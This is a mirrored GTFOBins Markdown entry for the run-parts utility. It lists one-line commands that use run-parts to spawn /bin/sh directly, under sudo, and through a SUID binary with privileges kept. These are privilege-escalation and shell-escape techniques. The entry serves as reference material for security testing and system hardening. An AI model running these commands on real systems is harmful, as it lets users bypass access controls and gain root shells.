mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
10 lines
230 B
Markdown
10 lines
230 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: run-parts --new-session --regex '^sh$' /bin
|
||
|
sudo:
|
||
|
- code: sudo run-parts --new-session --regex '^sh$' /bin
|
||
|
suid:
|
||
|
- code: ./run-parts --new-session --regex '^sh$' /bin --arg='-p'
|
||
|
---
|